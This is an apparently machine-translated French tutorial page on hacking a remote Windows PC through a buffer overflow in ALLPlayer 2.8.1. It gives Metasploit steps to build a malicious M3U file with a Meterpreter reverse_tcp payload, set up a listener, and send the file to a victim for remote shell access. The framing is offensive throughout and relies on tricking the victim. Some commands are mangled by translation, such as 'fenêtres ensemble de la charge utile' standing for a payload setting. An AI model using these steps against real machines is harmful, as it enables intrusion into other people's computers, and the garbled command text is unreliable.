Rechercher

Contact

HACK REMOTE PC WINDOWS A L'AIDE ALLPLAYER M3U BUFFER OVERFLOW

15/05/2014 11:52

 

Ce module Metasploit exploite une vulnérabilité de dépassement de tampon basé sur la pile en ALLPlayer 2.8.1 , causée par une longue chaîne dans une entrée de liste de lecture. En persuadant la victime à ouvrir un fichier. M3U spécialement conçu , un attaquant distant d'exécuter du code arbitraire sur le système ou provoquer crash de l'application . Ce module Metasploit a été testé avec succès sur Windows 7 SP1 .
Exploit cibles

ALLPlayer 2.8.1
exigence

Attaquant: kali Linux

Victime PC : Windows 7

Ouvrir Kali type de terminal msfconsole



Maintenant utiliser le type exploit/windows/fileformat/allplayer_m3u_bof

msf exploit ( allplayer_m3u_bof ) > fenêtres ensemble de la charge utile / Meterpreter / reverse_tcp

msf exploit ( allplayer_m3u_bof ) > set lhost 192.168.0.104 ( IP de l'hôte local )

msf exploit ( allplayer_m3u_bof ) > exploiter

Après nous générons avec succès le fichier m3u malveillant, il sera stocké sur votre ordinateur local

/ root/.msf4/local/msf.m3u

Maintenant, nous devons mettre en place un écouteur pour gérer la connexion inverse envoyé par la victime quand l'exploit exécuté avec succès .

utilisation exploit / multi / gestionnaire

fenêtres ensemble de la charge utile / Meterpreter / reverse_tcp

mettre lhost 192.168.0.104

exploiter

Maintenant envoyer vos fichiers msf.m3u à la victime , dès qu'ils téléchargent et l'ouvrir. Maintenant, vous pouvez accéder à la coquille de Meterpreter sur l'ordinateur de la victime